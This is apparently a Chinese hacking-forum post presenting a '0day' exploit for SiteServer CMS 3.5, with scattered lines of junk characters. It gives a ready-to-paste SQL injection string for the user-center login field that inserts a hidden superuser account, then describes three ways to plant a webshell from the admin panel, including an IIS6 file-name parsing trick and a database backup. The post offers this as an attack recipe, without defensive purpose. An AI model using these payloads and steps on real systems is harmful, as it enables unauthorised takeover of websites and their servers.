SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版
" Z! B4 ~& k5 T% \8 C
stieserver官网:www.siteserver.cn



EXP:
2 b' \+ l4 i1 ?0 t  t
$ }' Y' r2 D2 F) `; l直接访问UserCenter/login.aspx



用户名处输入：

123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--

0 r7 y5 ]  [9 \

密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
5 U! g; t2 Y8 M  K* [1 v
! D( W: `$ t. K; C9 \3 y

' k9 o# R) o/ @9 l之后再访问后台SiteServer/login.aspx用插入的用户登陆

4 P" E1 H9 l/ k" ~+ l

2 }  ?3 Y! [- j5 ]( F% k后台拿webshell的三种方法：
# f: D$ L6 [9 m+ o+ K6 \* J- `
8 t% v4 [( `# o1 p# G% H+ [) \一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、

: C- h$ Y$ ^' N* M% C; q成员权限-》添加用户-》用户名为：1.asp

- r9 }2 y1 u) V# G8 ^& Q' G, qhttp://127.0.0.1/usercenter/
9 ]% L' t, t8 o: T# ^* V
" {5 R1 E8 l* ]- z用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell

（ps：后台添加用户时不会验证是否含有非法字符）
; b+ M( k8 w$ \" p
1 q1 W: M; |$ R( y' c: t三、
9 x' H+ |0 S& Z; z6 f) `. s0 y" E
系统工具-》实用工具-》机器参数查看
' f+ J/ k- o! Y: t2 S可以看到数据库类型、名称，WEB路径

" v; L( ^' G3 ?' i2 P0 z系统工具-》数据库工具-》SQL语句查询
5 M2 s1 }( M& d  Q# I, }1 B6 @% Y这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
! J$ n. }8 ?& B3 g  D4 J